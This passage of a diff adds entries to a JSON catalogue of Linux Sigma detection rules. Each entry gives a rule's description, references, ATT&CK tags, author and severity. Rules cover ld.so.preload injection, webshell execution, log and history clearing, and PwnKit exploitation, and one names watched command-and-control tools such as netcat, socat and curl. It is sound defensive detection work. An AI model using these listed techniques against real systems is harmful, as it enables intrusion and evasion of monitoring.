"author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Administrative work" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Identifies modification of ld.so.preload for shared object injection. This technique is used by attackers to load arbitrary code into processes.", + "uuid": "4b3cb710-5e83-4715-8c45-8b2b5b3e5751", + "value": "Modification of ld.so.preload", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1574.006/T1574.006.md", + "https://eqllib.readthedocs.io/en/latest/analytics/fd9b987a-1101-4ed3-bda6-a70300eaf57e.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_ld_so_preload_mod.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.006" + ], + "creation_date": "2019/10/24", + "filename": "lnx_auditd_ld_so_preload_mod.yml", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects loading of kernel modules with insmod command.\nLoadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand.\nAdversaries may use LKMs to obtain persistence within the system or elevate the privileges.\n", + "uuid": "106d7cbd-80ff-4985-b682-a7043e5acb72", + "value": "Loading of Kernel Module via Insmod", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1547/006/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://linux.die.net/man/8/insmod", + "https://man7.org/linux/man-pages/man8/kmod.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.006" + ], + "creation_date": "2021/11/02", + "filename": "lnx_auditd_load_module_insmod.yml", + "author": "Pawel Mazur", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detect changes of syslog daemons configuration files", + "uuid": "c830f15d-6f6e-430f-8074-6f73d6807841", + "value": "Logging Configuration Changes on Linux Host", + "meta": { + "refs": [ + "self experience", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_logging_config_change.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.006" + ], + "creation_date": "2019/10/25", + "filename": "lnx_auditd_logging_config_change.yml", + "author": "Mikhail Larin, oscd.community", + "level": "high", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.\n", + "uuid": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", + "value": "Masquerading as Linux Crond Process", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/8a82e9b66a5b4f4bc5b91089e9f24e0544f20ad7/atomics/T1036.003/T1036.003.md#atomic-test-2---masquerading-as-linux-crond-process", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_masquerading_crond.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036.003" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_masquerading_crond.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "medium", + "falsepositive": "No established falsepositives", + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects enumeration of local or remote network services.", + "uuid": "3761e026-f259-44e6-8826-719ed8079408", + "value": "Linux Network Service Scanning - Auditd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1046/T1046.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_service_scanning.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1046" + ], + "creation_date": "2020/10/21", + "filename": "lnx_auditd_network_service_scanning.yml", + "author": "Alejandro Ortuno, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection.\nAn adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n", + "uuid": "f4d3748a-65d1-4806-bd23-e25728081d01", + "value": "Network Sniffing - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1040/T1040.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_network_sniffing.yml" + ], + "tags": [ + "attack.credential_access", + "attack.discovery", + "attack.t1040" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_network_sniffing.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrator or user uses network sniffing tool for legitimate reasons." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Rule to detect the use of the SCX RunAsProvider Invoke_ExecuteShellCommand to execute any UNIX/Linux command using the /bin/sh shell.\nSCXcore, started as the Microsoft Operations Manager UNIX/Linux Agent, is now used in a host of products including Microsoft Operations Manager.\nMicrosoft Azure, and Microsoft Operations Management Suite.\n", + "uuid": "045b5f9c-49f7-4419-a236-9854fb3c827a", + "value": "OMIGOD SCX RunAsProvider ExecuteShellCommand - Auditd", + "meta": { + "refs": [ + "https://www.wiz.io/blog/omigod-critical-vulnerabilities-in-omi-azure", + "https://github.com/Azure/Azure-Sentinel/pull/3059", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.initial_access", + "attack.execution", + "attack.t1068", + "attack.t1190", + "attack.t1203" + ], + "creation_date": "2021/09/17", + "filename": "lnx_auditd_omigod_scx_runasprovider_executeshellcommand.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "high", + "falsepositive": [ + "Legitimate use of SCX RunAsProvider Invoke_ExecuteShellCommand." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects password policy discovery commands", + "uuid": "ca94a6db-8106-4737-9ed2-3e3bb826af0a", + "value": "Password Policy Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1201/T1201.md", + "https://attack.mitre.org/techniques/T1201/", + "https://linux.die.net/man/1/chage", + "https://man7.org/linux/man-pages/man1/passwd.1.html", + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_password_policy_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1201" + ], + "creation_date": "2020/10/08", + "filename": "lnx_auditd_password_policy_discovery.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community, Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a reload or a start of a service.", + "uuid": "2625cc59-0634-40d0-821e-cb67382a3dd7", + "value": "Systemd Service Reload or Start", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_pers_systemd_reload.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ], + "creation_date": "2019/09/23", + "filename": "lnx_auditd_pers_systemd_reload.yml", + "author": "Jakob Weinzettl, oscd.community", + "level": "low", + "falsepositive": [ + "Installation of legitimate service.", + "Legitimate reconfiguration of service." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating screen capture of a desktop with Import Tool.\nHighly recommended using rule on servers, due to high usage of screenshot utilities on user workstations.\nImageMagick must be installed.\n", + "uuid": "dbe4b9c5-c254-4258-9688-d6af0b7967fd", + "value": "Screen Capture with Import Tool", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/09/21", + "filename": "lnx_auditd_screencapture_import.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects adversary creating screen capture of a full with xwd. Highly recommended using rule on servers, due high usage of screenshot utilities on user workstations", + "uuid": "e2f17c5d-b02a-442b-9052-6eb89c9fec9c", + "value": "Screen Capture with Xwd", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md#atomic-test-3---x-windows-capture", + "https://attack.mitre.org/techniques/T1113/", + "https://linux.die.net/man/1/xwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencaputre_xwd.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ], + "creation_date": "2021/09/13", + "filename": "lnx_auditd_screencaputre_xwd.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate use of screenshot utility" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detection use of the command \"split\" to split files into parts and possible transfer.", + "uuid": "2dad0cba-c62a-4a4f-949f-5f6ecd619769", + "value": "Split A File Into Pieces - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1030/T1030.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_split_file_into_pieces.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1030" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_split_file_into_pieces.yml", + "author": "Igor Fits, oscd.community", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects embeding of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "uuid": "ce446a9e-30b9-4483-8e38-d2c9ad0a2280", + "value": "Steganography Hide Files with Steghide", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_embed_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/11", + "filename": "lnx_auditd_steghide_embed_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects extraction of files with usage of steghide binary, the adversaries may use this technique to prevent the detection of hidden information.", + "uuid": "a5a827d9-1bbe-4952-9293-c59d897eb41b", + "value": "Steganography Extract Files with Steghide", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://vitux.com/how-to-hide-confidential-files-in-images-on-debian-using-steganography/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_steghide_extract_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/11", + "filename": "lnx_auditd_steghide_extract_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious activities as declared by Florian Roth in its 'Best Practice Auditd Configuration'.\nThis includes the detection of the following commands; wget, curl, base64, nc, netcat, ncat, ssh, socat, wireshark, rawshark, rdesktop, nmap.\nThese commands match a few techniques from the tactics \"Command and Control\", including not exhaustively the following; Application Layer Protocol (T1071), Non-Application Layer Protocol (T1095), Data Encoding (T1132)\n", + "uuid": "f7158a64-6204-4d6d-868a-6e6378b467e0", + "value": "Suspicious C2 Activities", + "meta": { + "refs": [ + "https://github.com/Neo23x0/auditd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_c2_commands.yml" + ], + "tags": [ + "attack.command_and_control" + ], + "creation_date": "2020/05/18", + "filename": "lnx_auditd_susp_c2_commands.yml", + "author": "Marie Euler", + "level": "medium", + "falsepositive": [ + "Admin or User activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects relevant commands often related to malware or hacking activity", + "uuid": "1543ae20-cbdf-4ec1-8d12-7664d667a825", + "value": "Suspicious Commands Linux", + "meta": { + "refs": [ + "Internal Research - mostly derived from exploit code including code in MSF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_cmds.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/12/12", + "filename": "lnx_auditd_susp_cmds.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects program executions in suspicious non-program folders related to malware or hacking activity", + "uuid": "a39d7fa7-3fbd-4dc2-97e1-d87f546b1bbc", + "value": "Program Executions in Suspicious Folders", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_exe_folders.yml" + ], + "tags": [ + "attack.t1587", + "attack.t1584", + "attack.resource_development" + ], + "creation_date": "2018/01/23", + "filename": "lnx_auditd_susp_exe_folders.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Admin activity (especially in /tmp folders)", + "Crazy web applications" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects commandline operations on shell history files", + "uuid": "eae8ce9f-bde9-47a6-8e79-f20d18419910", + "value": "Suspicious History File Operations - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.003/T1552.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_susp_histfile_operations.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.003" + ], + "creation_date": "2020/10/17", + "filename": "lnx_auditd_susp_histfile_operations.yml", + "author": "Mikhail Larin, oscd.community", + "level": "medium", + "falsepositive": [ + "Legitimate administrative activity", + "Legitimate software, cleaning hist file" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects a creation of systemd services which could be used by adversaries to execute malicious code.", + "uuid": "1bac86ba-41aa-4f62-9d6b-405eac99b485", + "value": "Systemd Service Creation", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1543/002/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.002/T1543.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_systemd_service_creation.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1543.002" + ], + "creation_date": "2022/02/03", + "filename": "lnx_auditd_systemd_service_creation.yml", + "author": "Pawel Mazur", + "level": "medium", + "falsepositive": [ + "Admin work like legit service installs." + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects System Information Discovery commands", + "uuid": "f34047d9-20d3-4e8b-8672-0a35cc50dc71", + "value": "System Information Discovery - Auditd", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1082/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2021/09/03", + "filename": "lnx_auditd_system_info_discovery.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects system information discovery commands", + "uuid": "1f358e2e-cb63-43c3-b575-dfb072a6814f", + "value": "System and Hardware Information Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-4---linux-vm-check-via-hardware", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_info_discovery2.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1082" + ], + "creation_date": "2020/10/08", + "filename": "lnx_auditd_system_info_discovery2.yml", + "author": "\u00d6mer G\u00fcnal, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems.", + "uuid": "4cb57c2f-1f29-41f8-893d-8bed8e1c1d2f", + "value": "System Shutdown/Reboot - Linux", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1529/T1529.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_system_shutdown_reboot.yml" + ], + "tags": [ + "attack.impact", + "attack.t1529" + ], + "creation_date": "2020/10/15", + "filename": "lnx_auditd_system_shutdown_reboot.yml", + "author": "Igor Fits, oscd.community", + "level": "informational", + "falsepositive": [ + "Legitimate administrative activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects extracting of zip file from image file", + "uuid": "edd595d7-7895-4fa7-acb3-85a18a8772ca", + "value": "Steganography Unzip Hidden Information From Picture File", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1027/003/", + "https://zerotoroot.me/steganography-hiding-a-zip-in-a-jpeg-file/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1027.003" + ], + "creation_date": "2021/09/09", + "filename": "lnx_auditd_unzip_hidden_zip_files_steganography.yml", + "author": "Pawel Mazur", + "level": "low", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Adversaries may use the information from System Owner/User Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.", + "uuid": "9a0d8ca0-2385-4020-b6c6-cb6153ca56f3", + "value": "System Owner or User Discovery", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_user_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1033" + ], + "creation_date": "2019/10/21", + "filename": "lnx_auditd_user_discovery.yml", + "author": "Timur Zinniatullin, oscd.community", + "level": "low", + "falsepositive": [ + "Admin activity" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects possible command execution by web application/web shell", + "uuid": "c0d3734d-330f-4a03-aae2-65dacc6a8222", + "value": "Webshell Remote Command Execution", + "meta": { + "refs": [ + "Personal Experience of the Author", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_web_rce.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2019/10/12", + "filename": "lnx_auditd_web_rce.yml", + "author": "Ilyas Ochkov, Beyu Denis, oscd.community", + "level": "critical", + "falsepositive": [ + "Admin activity", + "Crazy web applications" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands used in various Equation Group scripts and tools", + "uuid": "41e5c73d-9983-4b69-bd03-e13b67e9623c", + "value": "Equation Group Indicators", + "meta": { + "refs": [ + "https://medium.com/@shadowbrokerss/dont-forget-your-base-867d304a94b1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_apt_equationgroup_lnx.yml" + ], + "tags": [ + "attack.execution", + "attack.g0020", + "attack.t1059.004" + ], + "creation_date": "2017/04/09", + "filename": "lnx_apt_equationgroup_lnx.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects buffer overflow attempts in Unix system log files", + "uuid": "18b042f0-2ecd-4b6e-9f8d-aa7a7e7de781", + "value": "Buffer Overflow Attempts", + "meta": { + "refs": [ + "https://github.com/ossec/ossec-hids/blob/1ecffb1b884607cb12e619f9ab3c04f530801083/etc/rules/attack_rules.xml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_buffer_overflows.yml" + ], + "tags": [ + "attack.t1068", + "attack.privilege_escalation" + ], + "creation_date": "2017/03/01", + "filename": "lnx_buffer_overflows.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects specific commands commonly used to remove or empty the syslog", + "uuid": "e09eb557-96d2-4de9-ba2d-30f712a5afd3", + "value": "Commands to Clear or Remove the Syslog - Builtin", + "meta": { + "refs": [ + "https://www.virustotal.com/gui/file/fc614fb4bda24ae8ca2c44e812d12c0fab6dd7a097472a35dd12ded053ab8474", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_clear_syslog.yml" + ], + "tags": [ + "attack.impact", + "attack.t1565.001" + ], + "creation_date": "2021/09/10", + "filename": "lnx_clear_syslog.yml", + "author": "Max Altgelt", + "level": "high", + "falsepositive": [ + "Log rotation" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious modification of crontab file.", + "uuid": "af202fd3-7bff-4212-a25a-fb34606cfcbe", + "value": "Modifying Crontab", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.003/T1053.003.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_crontab_file_modification.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1053.003" + ], + "creation_date": "2022/04/16", + "filename": "lnx_crontab_file_modification.yml", + "author": "Pawel Mazur", + "level": "medium", + "falsepositive": [ + "Legitimate modification of crontab" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the use of tools that copy files from or to remote systems", + "uuid": "7a14080d-a048-4de8-ae58-604ce58a795b", + "value": "Remote File Copy", + "meta": { + "refs": [ + "https://attack.mitre.org/techniques/T1105/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_file_copy.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.lateral_movement", + "attack.t1105" + ], + "creation_date": "2020/06/18", + "filename": "lnx_file_copy.yml", + "author": "\u00d6mer G\u00fcnal", + "level": "low", + "falsepositive": [ + "Legitimate administration activities" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects the ld.so preload persistence file. See `man ld.so` for more information.", + "uuid": "7e3c4651-c347-40c4-b1d4-d48590fdf684", + "value": "Code Injection by ld.so Preload", + "meta": { + "refs": [ + "https://man7.org/linux/man-pages/man8/ld.so.8.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_ldso_preload_injection.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1574.006" + ], + "creation_date": "2021/05/05", + "filename": "lnx_ldso_preload_injection.yml", + "author": "Christian Burkard", + "level": "high", + "falsepositive": [ + "Rare temporary workaround for library misconfiguration" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects exploitation of Nimbuspwn privilege escalation vulnerability (CVE-2022-29799 and CVE-2022-29800)", + "uuid": "7ba05b43-adad-4c02-b5e9-c8c35cdf9fa8", + "value": "Nimbuspwn Exploitation", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/04/26/microsoft-finds-new-elevation-of-privilege-linux-vulnerability-nimbuspwn/", + "https://github.com/Immersive-Labs-Sec/nimbuspwn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_nimbuspwn_privilege_escalation_exploit.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1068" + ], + "creation_date": "2022/05/04", + "filename": "lnx_nimbuspwn_privilege_escalation_exploit.yml", + "author": "Bhabesh Raj", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects potential PwnKit exploitation CVE-2021-4034 in auth logs", + "uuid": "0506a799-698b-43b4-85a1-ac4c84c720e9", + "value": "PwnKit Local Privilege Escalation", + "meta": { + "refs": [ + "https://twitter.com/wdormann/status/1486161836961579020", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_pwnkit_local_privilege_escalation.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548.001" + ], + "creation_date": "2022/01/26", + "filename": "lnx_pwnkit_local_privilege_escalation.yml", + "author": "Sreeman", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects shellshock expressions in log files", + "uuid": "c67e0c98-4d39-46ee-8f6b-437ebf6b950e", + "value": "Shellshock Expression", + "meta": { + "refs": [ + "https://owasp.org/www-pdf-archive/Shellshock_-_Tudor_Enache.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shellshock.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ], + "creation_date": "2017/03/14", + "filename": "lnx_shellshock.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Clear command history in linux which is used for defense evasion.", + "uuid": "fdc88d25-96fb-4b7c-9633-c0e417fdbd4e", + "value": "Clear Command History", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.003/T1070.003.md", + "https://attack.mitre.org/techniques/T1070/003/", + "https://www.hackers-arise.com/single-post/2016/06/20/Covering-your-BASH-Shell-Tracks-AntiForensics", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_clear_cmd_history.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070.003" + ], + "creation_date": "2019/03/24", + "filename": "lnx_shell_clear_cmd_history.yml", + "author": "Patrick Bareiss", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.", + "uuid": "444ade84-c362-4260-b1f3-e45e20e1a905", + "value": "Privilege Escalation Preparation", + "meta": { + "refs": [ + "https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/", + "https://patrick-bareiss.com/detect-privilege-escalation-preparation-in-linux-with-sigma/", + "https://github.com/uber-common/metta/blob/master/MITRE/Privilege_Escalation/privesc_linux_filesystemweakness.yml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_priv_esc_prep.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2019/04/05", + "filename": "lnx_shell_priv_esc_prep.yml", + "author": "Patrick Bareiss", + "level": "medium", + "falsepositive": [ + "Troubleshooting on Linux Machines" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious shell commands used in various exploit codes (see references)", + "uuid": "2aa1440c-9ae9-4d92-84a7-a9e5f5e31695", + "value": "Suspicious Activity in Shell Commands", + "meta": { + "refs": [ + "http://www.threatgeek.com/2017/03/widespread-exploitation-attempts-using-cve-2017-5638.html", + "https://github.com/rapid7/metasploit-framework/blob/eb6535009f5fdafa954525687f09294918b5398d/modules/exploits/multi/http/struts_code_exec_exception_delegator.rb", + "http://pastebin.com/FtygZ1cg", + "https://artkond.com/2017/03/23/pivoting-guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/builtin/lnx_shell_susp_commands.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.004" + ], + "creation_date": "2017/08/21", + "filename": "lnx_shell_susp_commands.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "No established category", + "logsource.product": "linux" + } + }, + { + "description": "Detects suspicious log entries in Linux log files", + "uuid": 